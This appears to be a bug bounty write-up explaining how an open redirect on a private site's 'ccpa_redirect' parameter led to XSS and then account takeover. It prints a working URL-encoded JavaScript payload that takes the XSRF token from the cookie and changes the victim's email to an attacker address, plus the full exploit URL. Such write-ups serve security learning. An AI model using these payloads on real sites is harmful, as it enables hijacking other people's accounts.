Chaining Open Redirect with XSS to Account Takeover

Hello everyone, I hope you are well. In this article I will show you how I escalated XSS to Account Takeover. Since the target is private, let’s call as target.com.

The Open Redirect

I started testing target and register the account, while I register I can create my own subdomain for the organization like ownsubdomain.target.com. Then I logged in to the dashboard. Not long after, I found the url endpoint like this https://ownsubdomain.target.com/overview/?ccpa_redirect=

URL Endpoint

Then i tried to open redirect like this https://ownsubdomain.target.com/overview/?ccpa_redirect=https://evil.com and it was successfully, i was redirected to evil.com page :D. Then I tried to use this XSS payload javascript:alert(1); and opened in the browser, and yeah the XSS popped up.

Chaining the XSS to Account Takeover

After that, I didn’t immediately report the bug. I’m thinking of upgrading this XSS to a more severe impact. Shortly, I found a form that can change my email, like this

Form Change Email

But there is a CSRF-TOKEN protection. Then I remember that I have read a writeup about Chaining the XSS to severe impact. So, I make the payload for change my email and bypassed the CSRF-TOKEN protection with XSS vulnerability. The payload was like this :

javascript:var%20http=new%20XMLHttpRequest();%20http.open(%27POST%27,%27https://ownsubdomain.target.com/api/3/settings/account%27,%20true);var%20csrf=%20document.cookie.split(%27;%20%27).find(row%20=%253e%20row.startsWith(%27XSRF-TOKEN%27)).split(%27=%27)[1];http.setRequestHeader(%27X-Xsrf-Token%27,csrf);http.withCredentials=true;http.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);http.send(%27firstName=Hacked%2526lastName=byHacker%2526loginEmail=attacker@mail.com%26phoneNumber=%2526notificationEmail=attacker@mail.com%2526signature=%2526timezone=Asia/Jakarta%2526language=english%27);alert('email%20changed');

So, when I visited this URL https://ownsubdomain.target.com/overview/?ccpa_redirect=javascript:var%20http=new%20XMLHttpRequest();%20http.open(%27POST%27,%27https://subdomain.target.com/api/3/settings/account%27,%20true);var%20csrf=%20document.cookie.split(%27;%20%27).find(row%20=%253e%20row.startsWith(%27XSRF-TOKEN%27)).split(%27=%27)[1];http.setRequestHeader(%27X-Xsrf-Token%27,csrf);http.withCredentials=true;http.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);http.send(%27firstName=Hacked%2526lastName=byHacker%2526loginEmail=attacker@mail.com%26phoneNumber=%2526notificationEmail=attacker@mail.com%2526signature=%2526timezone=Asia/Jakarta%2526language=english%27);alert('email%20changed'); in browser, the alert will popped up and the email will changed.

Alert Popped Up
Email Changed Successfully

Then I reported this to the program, but I got duplicate :(

I hope you are enjoy my writeup, keep learning and stay safe.

Tips :

Don’t be quick to report any bugs you find, always look for more severe impacts.

Keep Silent.